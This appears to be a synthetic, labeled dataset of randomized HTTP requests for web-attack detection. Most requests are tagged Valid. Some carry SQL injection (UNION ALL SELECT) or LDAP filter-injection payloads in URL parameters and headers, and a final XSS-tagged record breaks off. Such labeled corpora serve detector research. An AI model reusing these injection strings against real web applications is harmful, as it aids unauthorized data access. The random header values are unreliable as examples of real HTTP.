If-None-Match: "FiYpy5UpDVnBwVhLB0aZ"
If-Range: *
Max-Forwards: 61
MIME-Version: 1.9
Pragma: mmwrpi0=wet
Authorization: Digest uri=/nhe8rqro/ieiarEMg/mNBfv/zNLo6/yuenpaol.jpeg
Range: 9-
Referer: http://tsei.gov/2gIhea5/t5vv/TyrZri.gif
TE: trailers
User-Agent: iqtiyratexntsn5is
UA-CPU: Sparc
UA-Disp: 6088,0787,32
UA-Color: color16
Via: 8.1 www.arbleen.tiff
Transfer-Encoding: deflate
Upgrade: ndceu/6.7, ageFw/6.9, ntidws/5.5
Warning: 988 www.Panx.gif "uhhf" "Wed, 07 Mar 07 21:03:39 UTC"
X-Forwarded-For: 97.235.140.149
----: ------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 37305
Start - Id: 42268
class: SqlInjection
GET /jVRplF/tuIuxy/gUyAO7X.AG.2MED./6Yboot.inidocumentHNGOK/enavalLdlnmb95njpa.cgi?nbs=yaoimap6yoj&XCQ@P=dr7um9nHC&fIkuusERw3=%7Ckto%27qp%3Atdggroup+by&dmrn5Bm2yer0=%27++%29+UNION++ALL+SELECT+++++ysfb2ant+++++%2C++++tpiso+%2C++xsoi+++FROM+++++ei8pVtlcq+WHERE+++7oAn0t+++NOT+IN+%28+%276rTtnpalt%27++++%29+AND++++ltspn+++++NOT++++IN+++++%28++++%27mc%27++++%29+++++AND+++%27%27++++%3D++++%27&u4gkao=478555 HTTP/1.0
Host: www.sAepbUa.com
Connection: close
Accept: text/html, text/plain;q=0.4, image/*;q=0.1
Accept-Charset: windows-1255
Accept-Encoding: identity;q=0.4
Accept-Language: *;q=0.4
Cache-Control: max-stale=7
Client-ip: 241.101.146.87
Cookie: intf=am.i_vv;aoinlyr4=55;brh=n\3~;tgi=540155;nslr=t20D.oF
Cookie2: $Version="64"
Date: Wed, 17 Jan 07 03:09:33 UTC
ETag: "cQI1KzijYNcy.dQfk"
Expect: u69omi=hocA
From: eethwr@T5iivnsieh.be
If-Modified-Since: Mon, 25 Apr 05 15:37:00 GMT
If-Unmodified-Since: Mon, 12 Jul 04 13:53:34 GMT
If-Match: *
If-None-Match: "il1.@MkBFhkiWavrJE"
If-Range: *
Max-Forwards: 485
MIME-Version: 5.6
Pragma: no-cache
Proxy-Authorization: NTLM ZWVlT2luN25CbmdyZmFla3JsbDF0YXkzZ3Rpa2xmbW4=
Authorization: Basic bGRoTGVncjpvamlu
Range: 996351-59792
Referer: /elhvore/HtnsH0R/tn6yRsp/sxad/erllcf.shtml
TE: trailers,trailers,trailers
Trailer: User-Agent
User-Agent: 64goHWOW http://www.hiiccse.st
UA-CPU: PowerPC
UA-Disp: 8058,0040,16
UA-OS: Windows NT
UA-Color: color32
UA-Pixels: 0775x379
Via: FTP/9.7 166.205.20.231, 5.3 86.160.126.93:7
Transfer-Encoding: gb3e; rszmuo=qeq9hR
Upgrade: gtaeas/6.8, ae9e/5.6, rdaei/1.7, ilto/8.7, n5w/5.4
Warning: 301 34.243.209.148:30161 "olzejaFnho9ieieodT" "Fri, 02 Jan 09 11:48:48 CET"
X-Forwarded-For: 42.114.104.151
X-Serial-Number: 280200406213
----: -----------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 42268
Start - Id: 24673
class: Valid
GET /oRgq/wU.rrW_dnAZIlQSL/tsahrodYutjtPatfb/n6dorLVoe1e/lei2oa7uo1rndosr/jL-.shtml?buntleAUu=6088&cFsetlobosp4io2=192131&lgvWFkQU=321158&wzaamdr3hssii=05660555&5xs0=+%5BacaiCtxtaevuenddreplace5&tnKnethdh=79170&haiuEKldos=9&mbjl6oo=klath%3BdjStoh%3Ea&LeSoDdieiqar=p&ets5ovmba1f=%25aina%5DheInqm&HAkS7=88247&TbshutdownzZeiyAMZC=0Ohev&EcdropWT=6289&coeaeeU7newenpm=on4yO9hqeultPet3et HTTP/1.1
Host: 89.126.107.157:80
Connection: close
Accept: text/xml, text/*;q=0.3, video/mpeg;q=0.4
Accept-Charset: *
Accept-Encoding: compress, compress;q=0.1, compress;q=0.5
Accept-Language: ieow-eeou5s;q=0.8, ieou-Dl;q=0.4
Cache-Control: max-age=21
Client-ip: 148.233.252.203
Cookie: Es2iiesP0yhe= mfte;fue=x@J_;kgitttS=2622369;ic=y/e@w\oDseR:=rwmno0aa;vo7bqnrlehtyon=83;iB.aE-=Doscag
Cookie2: $Version="0"
Date: Tue, 04 Aug 09 10:01:05 CET
ETag: "UUtSeN9LUVPQfT3E"
Expect: u5o62at
From: tloo@08oaacota.gov
If-Modified-Since: Tue, 16 Dec 08 16:34:10 UTC
If-Unmodified-Since: Tue, 01 Aug 06 13:42:58 CET
If-Match: *
If-None-Match: *
If-Range: "HgYSsZBfjzXmedJPxv"
Max-Forwards: 7558
MIME-Version: 2.2
Pragma: no-cache
Proxy-Authorization: ey32r aystd9=ymtsuleh
Authorization: Basic bm1KNWU6ZWg5bWg=
Range: 628095-,47-562,-3325
Referer: /yta1/8ejau/Reoasiwi/tjenJnl/dfftu.tiff
TE: gzip;q=0.7,trailers,trailers
Trailer: Expect
User-Agent: 8luryrtE4atApddrtfrd
UA-CPU: PowerPC
UA-Disp: 986,554,32
UA-OS: WinNT
UA-Color: color8
UA-Pixels: 089x5784
Via: 0.6 58.50.49.95
Transfer-Encoding: Ncqi
Upgrade: wit/8.9
Warning: 540 44.10.123.96:4 "peien0ehi" 
X-Forwarded-For: 248.154.151.220
X-Serial-Number: 791354389748242566
----: --------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 24673
Start - Id: 9745
class: Valid
GET /gelJ5ueE2Md@ybFm07/eeu/Sn/t2thY8tht7/E3zJy4P/dectUg7u@OD/QVvH/gz3L.BEk-XhJV6zs_/IeieaTsotiouzi/nDnse0hu.shtml?xTscopydwshutdownWH6=9176643&ne1=oes&aoeewuemrmeh=%2Bqgf5t6group+by7&nFabk09ltkRrt=jmiyio2rtHetana&eredo5=10072988&wels=ilorveaehupdatelonullorm&9epassthruiframeMBstdinnP4y7=rrr7vs HTTP/1.1
Host: www.7iiLdup.org:879
Connection: 94Idoi
Accept: audio/*;q=0.4, audio/x-wav;q=0.6, video/quicktime
Accept-Charset: x-mac-arabic;q=0.3, iso-8859-5;q=0.4, hz-gb-2312;q=0.2, x-mac-chinesetrad;q=0.4, iso-8859-3
Accept-Encoding: 
Accept-Language: *
Cache-Control: rrb7='o77cRitc'
Client-ip: 96.211.227.235
Cookie: K.boot.iniDPM273O1=eSiA;detstntAbroa=sa8ae
Cookie2: $Version="733"
Date: Fri, 30 Apr 04 22:16:09 CET
ETag: "uTlKpiHqz80X2U1"
Expect: 100-continue
From: eLae2iyg@i6ilvqwa.ch
If-Modified-Since: Tue, 25 Oct 05 08:54:48 UTC
If-Unmodified-Since: Mon, 15 Dec 08 24:32:45 UTC
If-Match: "MYrWb0iwnTM6EJqT"
If-None-Match: "s6Vn9S6@30T-ahwwXDR."
If-Range: Fri, 27 Jan 06 05:37:37 UTC
Max-Forwards: 89
MIME-Version: 8.6
Pragma: ipAeIA=h4
Proxy-Authorization: tonFs fnhRm=aeofnoj
Authorization: NTLM aTdPYWl0MGhhaDluZHJsYWVlM3NyZHNVZXJhazBjZXRsdTlnZW5hc29k
Range: 2-18,-5
Referer: http://afzrtd.net/ImjL.dll
TE: chunked,trailers,trailers
Trailer: Accept-Language
User-Agent: iZruvhk http://www.tklaib.it
UA-CPU: StrongARM
UA-Disp: 5705,3975,16
UA-OS: Windows NT
UA-Color: color8
UA-Pixels: 6817x021
Via: 3.2 132.53.241.212:59866, FTP/9.2 www.e0amtd.html
Transfer-Encoding: deflate
Upgrade: amceib/4.5, rmeBe/8.4, muaagw/6.1
Warning: 820 88.67.174.126 "oueorncn" "Fri, 18 Feb 05 24:11:21 CET"
X-Forwarded-For: 96.14.41.86
X-Serial-Number: 937322
----: ----------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 9745
Start - Id: 9739
class: Valid
GET /tE/etqnUa/d8g7G/K1replaceU/eyJA.htm?az=7781&5iT0aIctehory=757900&todteo=sla9%2Fzhnull0cSc5t4S&0Ee5satslssytyh=oUQBZu4-n&Ye0l4Cuwiaarhaa=7sock_streamaoiframe9eBttIh1nrP16a&z.YW5likeCdropqP1=ln+Omo%3Bl23gu HTTP/1.1
Host: www.sa1fb.biz
Connection: tyr10
Accept: */*
Accept-Charset: *;q=0.6
Accept-Encoding: *;q=0.8
Accept-Language: ple9nr-o;q=0.8, lni-grjle3i;q=0.3, soe-rrx, iBpestdf-tuy;q=0.4
Cache-Control: rrb7='o77cRitc'
Client-ip: 75.150.118.187
Cookie: FXUonnetcatbnEO8e=5WG3EzD8U;s4aelodWef=6g9q;iU=nlai
Cookie2: $Version="5"
Date: Sun, 28 Jun 09 22:34:00 GMT
ETag: W/"WLa5g6xEO7WZjPeVSTe"
Expect: 100-continue
From: eLae2iyg@i6ilvqwa.ch
If-Modified-Since: Tue, 25 Oct 05 08:54:48 UTC
If-Unmodified-Since: Wed, 04 Jan 06 07:48:34 UTC
If-Match: "MYrWb0iwnTM6EJqT"
If-None-Match: *
If-Range: *
Max-Forwards: 0267
MIME-Version: 9.0
Pragma: n=emeeam
Proxy-Authorization: NTLM U25yenYwYXNodXNoYnNhSXJlb2RmZDhhT2llZHZub2Fwb0NuaExybA==
Authorization: bulwo r79ex=tyny
Range: 1-
Referer: http://www.sItnCse.be/fosne/e1shhr.jpeg
TE: chunked,trailers,trailers
Trailer: Accept-Language
User-Agent: dinEti/2.4.6.9.0
UA-CPU: StrongARM
UA-Disp: 5705,3975,16
UA-OS: Windows 98
UA-Color: color8
UA-Pixels: 6817x021
Via: 7.7 85.108.186.34, FTP/1.5 www.gt7mr.js, FTP/9.5 www.eAuttni.css
Transfer-Encoding: deflate
Upgrade: amceib/4.5, rmeBe/8.4, muaagw/6.1
Warning: 820 88.67.174.126 "oueorncn" "Fri, 18 Feb 05 24:11:21 CET"
X-Forwarded-For: 96.14.41.86
X-Serial-Number: 937322
----: -----------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 9739
Start - Id: 30725
class: Valid
GET /x0t.KlaEh/evM-q1o0d7jvO@WX/VYccJ/f.dxL8U4ZmyixQ/vE./9iRaa99tfnsonttnn1ts/r8H6netcatS/oUr7gttm/e9J5nqyenx/Jrj1object8EWCformyKZ/lLB@.php3?efassr=script7rcp&ngstt0toeee=9 HTTP/1.0
Host: www.geneprfi.gov:00
Connection: keep-alive
Accept: application/zip;q=0.1, image/*
Accept-Charset: *;q=0.5
Accept-Encoding: *;q=0.6
Accept-Language: *;q=0.6
Cache-Control: max-age=94733
Client-ip: 45.133.46.216
Cookie: eerelpdlbnu6R=hxYv-rt@sN;lm=9387841
Cookie2: $Version="3"
Date: Thu, 08 Dec 05 23:36:22 UTC
ETag: "BcxivruTmgxjLi._A"
Expect: gWsmmbl
From: dubt@tmrdi.net
If-Modified-Since: Thu, 17 Aug 06 22:05:57 CET
If-Unmodified-Since: Mon, 29 Sep 08 14:04:47 UTC
If-Match: *
If-None-Match: "q1SFRcs.QikuNaK5reZ"
If-Range: *
Max-Forwards: 1533
MIME-Version: 7.4
Pragma: linylsgX=es0s
Proxy-Authorization: uwea ht18Lnh=tnrantuh
Authorization: Digest username="tkaelef"
Range: 1-,-425,74618-
Referer: http://mmIbbanu.st/hsaioA.sh
TE: trailers,deflate;q=0.3,trailers
Trailer: Accept-Language
User-Agent: iXUy@AMcsL http://www.YfEth.fr
UA-CPU: x86
UA-Disp: 802,001,8
UA-OS: Win98
UA-Color: color16
UA-Pixels: 2445x5903
Via: Ocpt/9.4 231.191.254.140:7, HTTP/6.1 121.70.132.35:22097, 5.8 www.omha.shtml
Transfer-Encoding: tstN3
Upgrade: uom4/0.1, suMtl/8.8
Warning: 309 www.mtrueg.jpeg:8 "enaoExpt2ech" "Sun, 23 Oct 05 23:02:27 CET"
X-Forwarded-For: 31.136.183.183
X-Serial-Number: 248623
----: ----------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 30725
Start - Id: 16797
class: Valid
GET /0OhFNITdu/riad6ieyLunadkd37pA/mFIfumE9Tl3O/orBeTOTwR7libMuV/hGxPoc/xsMx@RvGwPSPQR/ti.htm?Tisto=reit+&Pcs0=ty6EDd6fAZ5&fa=fyepOHqX&rfXezcx=4RR HTTP/1.1
Host: 56.17.226.220:02
Connection: keep-alive
Accept: text/*;q=0.5, application/*
Accept-Charset: *;q=0.4
Accept-Encoding: *;q=0.5
Accept-Language: es-7we, vo-ihtiscw, e-eemvpAn
Cache-Control: only-if-cached
Client-ip: 41.79.231.230
Cookie: 6erfoEait=insertdnogo
Cookie2: $Version="53"
Date: Mon, 08 Aug 05 12:55:15 UTC
ETag: "Ppyt6cEuEC9dpgF"
Expect: 100-continue
From: qeirgp@9goyD.st
If-Modified-Since: Mon, 14 May 07 20:03:27 GMT
If-Unmodified-Since: Tue, 04 Jul 06 09:20:06 CET
If-Match: "aJpIkAl3@JnYzXpKnW-"
If-None-Match: *
If-Range: *
Max-Forwards: 32
MIME-Version: 3.4
Pragma: no-cache
Proxy-Authorization: Digest uri=/0naYTtga/isasndt/dhsaNs/gnre.pl
Authorization: Digest qop=6nr5rol
Range: 819615-,9-2755,-87015
Referer: /9megenEe.mpeg
TE: trailers
Trailer: Referer
User-Agent: Mozilla/4.9 (Windows; U; Windows NT 6.7; re-us; rv:1.4.0) Gecko/87357217
UA-CPU: PowerPC
UA-Disp: 460,9204,32
UA-OS: Win95
UA-Color: color16
UA-Pixels: 561x3269
Via: 9.8 www.tosseyaa.shtml, HTTP/3.5 93.255.62.239
Transfer-Encoding: Rofnr
Upgrade: yxx/3.4
Warning: 620 28.253.168.33 "eIhu" "Thu, 07 Feb 08 14:55:42 CET"
X-Forwarded-For: 126.157.223.224
X-Serial-Number: 60090044663
----: --------------------------
~~~~~: ~~~~~~~~~~~

null

End - Id: 16797
Start - Id: 13386
class: Valid
GET /h8b_NxPI@L3vZKYW/nKpcW/dbrH-@dxnDOxlF/r8pc-lDV3sRAkP/gLyd56uSI0Du4D/nNKJpgMVgvPw/jqWjIQ@Rz@4sGAhE8Yf/smninu/tGE9oyqesesgit4i/tao/mrio8eihothmYgAeprf/w@z@_Yaiqx.jsp?cEsqeamnbhmhb=ienieib&YP7CrI0N=csei HTTP/1.0
Host: 45.185.33.50
Connection: keep-alive
Accept: audio/*;q=0.1, text/*
Accept-Charset: *;q=0.8
Accept-Encoding: 
Accept-Language: h6a-fh;q=0.4, otm-llPCsei, skeire-3ceshpss;q=0.6
Cache-Control: min-fresh=1
Client-ip: 88.65.120.166
Cookie: 0TkJJT-enY1s=2457185;htoenrgcs1Sv=642647961
Cookie2: $Version="49"
Date: Mon, 23 Jun 08 24:10:21 GMT
ETag: W/"YHWB-pSd1IKDDMSDMhX"
Expect: 100-continue
From: tR8tllhl@cnlly.de
If-Modified-Since: Sun, 08 Feb 04 10:23:54 CET
If-Unmodified-Since: Sat, 22 Dec 07 12:46:39 GMT
If-Match: "fv5@I_7E1_T0kEEorL"
If-None-Match: *
If-Range: *
Max-Forwards: 035
MIME-Version: 5.1
Pragma: no-cache
Proxy-Authorization: cost eNin=l2ee4li
Authorization: Basic ZWVzbnZsZG46bmlsZA==
Range: -95
Referer: /ueudRnl.php
TE: chunked,gzip;q=0.2
Trailer: Connection
User-Agent: euneF/9.3.6.1.3
UA-CPU: x86
UA-Disp: 6806,3540,16
UA-OS: Windows NT
UA-Color: color32
UA-Pixels: 968x9217
Via: FTP/6.6 198.172.176.73, 9.9 www.it6id.shtml:590, 1.5 www.0bs2qgc.css
Transfer-Encoding: identity
Upgrade: tNatdt/7.8, 7ear/6.7, nTyilu/3.1, oyem/6.0
Warning: 460 215.203.137.33 "oi7darmTgosciI0eae4j" 
X-Forwarded-For: 245.210.86.17
X-Serial-Number: 0029155789665263
----: ---------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 13386
Start - Id: 31975
class: Valid
GET /rtrecpueoPtt4nJ8E.cgi?neeotipsPsnoe=uE+r%5Bemaaccess_logiegt&2ncos6awa=x8AHF&DKaj3RbetweenBelhg=ebqrm&g9=36860&otNlotnAnNOsft=41905&lts=6&lnelwk=ous0szAinrhcis&AFbinsertBLQmeq=1298657027&ertra=mbek2O0ften&sfnu7bfcwp=491333&ni=hbgsoundn&heBig=aenfermrnsnes%2Bi%25naa&minintts=u0&petreyno=acbE-RJuXD HTTP/1.0
Host: www.Lghth0wt7.org
Connection: close
Accept: */*;q=0.8
Accept-Charset: windows-1258;q=0.2, x-mac-turkish, iso-8859-7;q=0.7, euc-cn
Accept-Encoding: deflate;q=0.0, identity
Accept-Language: *;q=0.7
Cache-Control: axi=encdy
Client-ip: 151.38.107.215
Cookie: E99F2deleteViZ29X=IrtoqhnUoo;7Xh4e2NUoVunion=8u;u9WQHjc=027;omjzge=5961
Cookie2: $Version="0"
Date: Mon, 31 Dec 07 09:20:50 CET
ETag: "7hKX84qz92r5rlc_cetE"
Expect: ipnsrD=g9nzpz
From: aiotemos@ar4lgiownn.be
If-Modified-Since: Sun, 23 Aug 09 16:03:32 GMT
If-Unmodified-Since: Sun, 11 Jan 04 13:55:24 UTC
If-Match: ".ty2Nrzp6gZWjDIO-"
If-None-Match: "hPCJQa-b0.RcRbD2Icr"
If-Range: *
Max-Forwards: 06
MIME-Version: 2.1
Pragma: no-cache
Proxy-Authorization: Basic ZHJocXJ6dTA6d3J0YWE=
Authorization: NTLM MHdkeWZobG5hd2lpUEFlbnVRaTNpcGV4Y3U2dGlzT2VRNmFlb2N0dHhsMnNp
Range: -3
Referer: /ebtrt/osoL1/heet/mz8alt/q9hlpaR.asp
TE: gzip,chunked,gzip;q=0.6
Trailer: Cache-Control
User-Agent: tojoosilrr/6.9.3
UA-CPU: Sparc
UA-Disp: 3482,947,16
UA-OS: Windows 98
UA-Color: color32
UA-Pixels: 3303x4060
Via: 7.5 32.245.183.116, 2.6 www.eh8idhtn.gif, 5.4 142.254.63.211
Transfer-Encoding: identity
Upgrade: ncej/3.7, hiyr3/1.0
Warning: 148 www.psN0t.tiff "Ha8aevrPaReu2aaa" 
X-Forwarded-For: 24.237.69.183
X-Serial-Number: 372913
----: --------------------------------------
~~~~~: ~~~~~~~~~~~~~~~

null

End - Id: 31975
Start - Id: 38529
class: LdapInjection
GET /spawoh/lnetfpionerUecslr/tJzkBeJXS_.jpg?0qaasrain=%29++%28++%7C+%28+++cn%3D*o++++%27brien*++%29%28mail%3D*o++++%27brien*+%29&audao8Tpote=te&--YUriSuUid=6109&p_EhNN=odt%28n&353inCNHE=150231770&htlmicnonyldaq=629&4cppy=%7Cxml%255&oa=5&lret=598618 HTTP/1.1
Host: www.nnOdN1ev.it
Connection: keep-alive
Accept: */*
Accept-Charset: *;q=0.5
Accept-Encoding: 
Accept-Language: colhusn-nii8o
Cache-Control: max-stale
Client-ip: 101.131.250.156
Cookie: teeuospl=>e ;6w=~nl;e6cuneiesma=tz0VQVaZV;nefnt2eVuta=i.4uZZB
Cookie2: $Version="13"
Date: Tue, 13 Jan 04 24:14:51 CET
ETag: W/"fAffeoKc6SLNsUm"
Expect: aieFs
From: n9eatae@mdeel.gov
If-Modified-Since: Thu, 14 Jun 07 13:58:16 GMT
If-Unmodified-Since: Sat, 18 Nov 06 02:11:00 GMT
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 7252
MIME-Version: 4.8
Pragma: mse8ut='otErl'
Proxy-Authorization: NTLM Z2RpZWZmYTBGUG1yQWRpSUhuUnQ5SjNpbzNzSWxuZXJVYXRzdGlvZW1veGxJbGlh
Authorization: NTLM YmV3eWVkbGVkM2RvbFFzZW5td0RhYTNUQ3RkZWdzOG4=
Range: 548411-,-37195
Referer: http://wnd0la.gov/devf/Bonolw/eqolees/e7do9x/O5we.asp
TE: trailers
Trailer: If-Range
User-Agent: Mozilla/9.0 (X11; U; Open BSD i386 0.0; dt-En; rv:8.0.2) Gecko/89278504
UA-CPU: MIPS
UA-Disp: 967,395,8
UA-OS: Windows NT
UA-Color: color8
UA-Pixels: 8726x4401
Via: 1.3 25.36.217.71, HTTP/0.0 47.92.72.187
Transfer-Encoding: Eeamy; srlf=A9rp
Upgrade: piFi/9.7, A4e1/7.0, 7lsnih/3.7
Warning: 494 103.11.37.183 "1br62beg" 
X-Forwarded-For: 101.186.114.243
X-Serial-Number: 30599
----: -------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 38529
Start - Id: 32261
class: Valid
GET /xtiecexi.bin?e3odrpaehsan=eI8GzDqZNx HTTP/1.0
Host: www.spiuqce.st:16
Connection: close
Accept: */*
Accept-Charset: *;q=0.8
Accept-Encoding: *
Accept-Language: 2uchaaee-trdis;q=0.9
Cache-Control: no-cache
Client-ip: 207.244.239.75
Cookie: hieegEeS=trotr6eusrnntRun
Cookie2: $Version="518"
Date: Mon, 23 Oct 06 10:07:40 GMT
ETag: W/"mPGh3SeD1JfvyjkXwgc1"
Expect: dEvf=ealzsyq
From: ajtRne@yawe.com
If-Modified-Since: Tue, 24 Mar 09 12:07:35 GMT
If-Unmodified-Since: Thu, 30 Nov 06 11:23:29 GMT
If-Match: *
If-None-Match: "6vD2cw@QTC6ZAIo2Ppg"
If-Range: Thu, 04 Nov 04 16:44:11 UTC
Max-Forwards: 1
MIME-Version: 6.1
Pragma: no-cache
Proxy-Authorization: srie 7y85rp=eaTsher
Authorization: Basic ZnR1b1RhNzoxZjhlZQ==
Range: -265,3-,-2
Referer: http://iieywthq.fr/dglta/omerst/b0skIas/ia3ft89/giijrt7.css
TE: trailers
Trailer: Trailer
User-Agent: 93gZck http://www.jaatCiry.ch
UA-CPU: PowerPC
UA-Disp: 8350,6514,8
UA-OS: Win95
UA-Color: color16
UA-Pixels: 2503x5889
Via: 1.3 www.tsagZr.html
Transfer-Encoding: identity
Upgrade: skeho/2.7
Warning: 276 144.197.192.204 "hsEwst6bs9l" "Wed, 19 Mar 08 20:42:32 GMT"
X-Forwarded-For: 132.144.23.218
X-Serial-Number: 23704390818995644
----: ------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 32261
Start - Id: 37316
class: LdapInjection
GET /Yh-RfYS_PimgYuvG/mu9nb7Wrpb09e/vxI2M0amaGZZ4/Gxa0LqK.jpeg?ye7t=msaDb&6tnxupositionvbscriptSpP=87930029&yNn0=ge+ic1v+u HTTP/1.0
Host: www.emtraoeDe.org
Connection: Ltxs
Accept: text/*
Accept-Charset: isiri-3342;q=0.2, koi8;q=0.1, utf-7;q=0.8, cp-936;q=0.0, gb2312
Accept-Encoding: erih)(&(objectClass    =    tmi*)
Accept-Language: *
Cache-Control: no-transform
Client-ip: 163.171.38.168
Cookie: e8iddu=488;eeeitatJReaoioS=806
Cookie2: $Version="651"
Date: Wed, 15 Feb 06 04:52:39 GMT
ETag: "SqzTXG3cL_LrKvg7K"
Expect: 100-continue
From: rtec@se2cehaQn.com
If-Modified-Since: Fri, 20 Feb 04 08:16:42 GMT
If-Unmodified-Since: Wed, 15 Feb 06 10:51:58 GMT
If-Match: *
If-None-Match: "r4@o@yIuyqTyNzVgc@sS"
If-Range: "pdoHUpwqfO.s4MJwGbFR"
Max-Forwards: 8901
MIME-Version: 4.6
Pragma: u='au5shhl'
Proxy-Authorization: Basic bmNlYWVudW06b2lvb2Fh
Authorization: Digest nc=f26c3C64
Range: 1-568088,6956-8,075-
Referer: http://www.ea6ynr.com/1aU1y2t/w5sge6/dadD2.png
TE: chunked;q=0.4,trailers,gzip
Trailer: Host
User-Agent: tc0R7G http://www.istr.it
UA-CPU: StrongARM
UA-Disp: 050,5091,32
UA-Color: color16
Via: 7.0 71.227.47.29:9742
Transfer-Encoding: gzip
Upgrade: cgnl/2.0
Warning: 537 241.108.176.114:3 "suareips" 
X-Forwarded-For: 220.106.136.48
X-Serial-Number: 8290332205189510
----: -----------------------
~~~~~: ~~~~~~~~~~~~~~~

null

End - Id: 37316
Start - Id: 9753
class: Valid
GET /eT/siHesashe1RnRba/nk3acmrMGBSiGapVGg/uhL2SmjdC/hm9A8aeyo5tse1zetah/q8b.asp?rnnlpEr=2767795445&Isdrop92p=S%27n%2Bceo%40sock_streamHa7qrss&wrnImA5dsaauh=3&msoge=odocgE&AZufWeRCuHjh=iaeoa0j7qhorA HTTP/1.0
Host: www.Deae5eo.de
Connection: keep-alive
Accept: image/gif;q=0.4, audio/*
Accept-Charset: *
Accept-Encoding: deflate;q=0.7, gzip
Accept-Language: *
Cache-Control: no-store
Client-ip: 63.10.196.4
Cookie: rUcathLl=570720;ttwXleare=adminq3 Rmt;nfoaeoyexowqie=LfNt0>szd enYe do;1Tortiddc8otRW=t6WqPgPnW;dne7=oioqsuyrADAeE;dwutn=a5
Cookie2: $Version="350"
Date: Sat, 06 Mar 04 20:22:00 CET
ETag: "4fivot.J_rjq4aU"
Expect: 100-continue
From: eLae2iyg@i6ilvqwa.ch
If-Modified-Since: Sun, 18 Sep 05 04:44:13 CET
If-Unmodified-Since: Thu, 01 Jul 04 13:55:03 GMT
If-Match: "BDFwfTzvehUb0Z.w.MPB"
If-None-Match: *
If-Range: "K3UBbPT8isCx_ub"
Max-Forwards: 6414
MIME-Version: 4.6
Pragma: no-cache
Proxy-Authorization: tonFs fnhRm=aeofnoj
Authorization: zeeA ffuqrijn=eo5rchOa
Range: -585780,60750-302396,970996-
Referer: /tDeli6/wi5tfhH/hqIwtir/oka1sm.zip
TE: trailers,trailers,gzip
Trailer: Referer
User-Agent: Mozilla/5.1 (X11; U; Open BSD i386 3.5; e7-rl; rv:3.6.1) Gecko/42810278
UA-CPU: StrongARM
UA-Disp: 5705,3975,16
UA-OS: Windows NT
UA-Color: color8
UA-Pixels: 6817x021
Via: HTTP/8.1 195.143.175.30, HTTP/4.8 www.gmreZr.jpg, 4.1 www.Gtdnn6x.shtml
Transfer-Encoding: compress
Upgrade: hwievr/3.7
Warning: 953 180.113.100.133 "os75rearnh" "Sun, 27 Apr 08 19:25:31 CET"
X-Forwarded-For: 199.75.6.60
X-Serial-Number: 937322
----: ----------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 9753
Start - Id: 32822
class: Valid
POST /@v3_/6_/itgilagdmtfhesaphsO/eunhhyheaSnnpTtts/lOsEY@52Qm9oyfaEj/nryc/o9gUT3o/iQF1s7/0lAJdyP9hFhL8e/rxbMx682i9A@.php4? HTTP/1.0
Content-Length: 174
Content-Language: iE,t
Content-Encoding: identity
Content-Location: http://c5buei.be/nEiM/sotR30S/os5turaa/noDirhke/7arl.ace
Content-MD5: ZXVhaG1sd0Vub3FpaW5laQ==
Content-Type: application/x-www-form-urlencoded
Expires: Sun, 18 Jan 09 24:45:54 GMT
Last-Modified: Mon, 19 Jul 04 09:55:44 UTC
Host: 103.118.128.55
Connection: close
Accept: audio/basic
Accept-Charset: *;q=0.1
Accept-Encoding: *
Accept-Language: *
Cache-Control: max-stale=49
Client-ip: 238.106.183.32
Cookie: s7atf4shs=85654550;ic3v6ahbhgwd=9cfghdrblorcoddfau
Cookie2: $Version="657"
Date: Thu, 08 Feb 07 14:54:26 CET
ETag: W/"iRufFcS72UWokGj5DLo"
Expect: rdlslz=jdHI;ep23s4a=epna0to
From: ci0lcoo@or8ttw.ch
If-Modified-Since: Mon, 05 May 08 24:01:03 GMT
If-Unmodified-Since: Tue, 20 Sep 05 24:54:09 CET
If-Match: "tfG0XH.MBv.gsw1ZFhz"
If-None-Match: "Kw5.AV7PJmmXjuV"
If-Range: Mon, 28 Feb 05 24:17:12 CET
Max-Forwards: 49
MIME-Version: 0.8
Pragma: no-cache
Proxy-Authorization: 1e5et aieatut=rah4tea
Authorization: NTLM cmRzYXRqb3R5ZmVhdGU5YWRyZkM1aWRyZWFUbWhhd2FSRTYyOWRpdA==
Range: -92,-97
Referer: /ihrioge2.pdf
TE: gzip
Trailer: Trailer
User-Agent: Mozilla/2.9 (Windows; U; Windows NT 3.3; ut-tn; rv:6.8.8) Gecko/95558187
UA-CPU: 68000
UA-Disp: 6288,1100,32
UA-OS: Win9x
UA-Color: color32
UA-Pixels: 1238x1114
Via: nrsco/1.2 199.129.156.14, 1.3 66.118.8.182, cwevsn/7.7 www.Emrutrsi.html
Transfer-Encoding: dAdge; ufoLa=eswge
Upgrade: a1gnfr/1.8, dT1/0.1
Warning: 175 www.sl7Ocpt.jpg:342 "0uw6Ne" "Fri, 08 Feb 08 18:17:21 CET"
X-Forwarded-For: 149.185.179.218
X-Serial-Number: 6352677
----: -------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

eswileoe=sstidhtq7ohomehse&dtsusga=f'siBH&eyretswyaet9h=akpc@55c&i4ypi=sNoso&Qsock_streamtS0dV=d9sk9u+snullservicesAa&clocationpAjUMnodeQ=77475673&xtusaty6Tattr6w=roehe

End - Id: 32822
Start - Id: 46843
class: XSS
POST /kcgNVmoSQXWXf9T/oQ4UX/83j2uxoTVGdIl0peG/dB_0/rLec-X.jpeg? HTTP/1.0
Content-Length: 246
Content-Language: Rl
Content-Encoding: identity
Content-Location: /wo4t/zxqmr6/fhce/oetl.jsp
Content-MD5: MjRpdGtSdWZpb2FBcmNwZA==
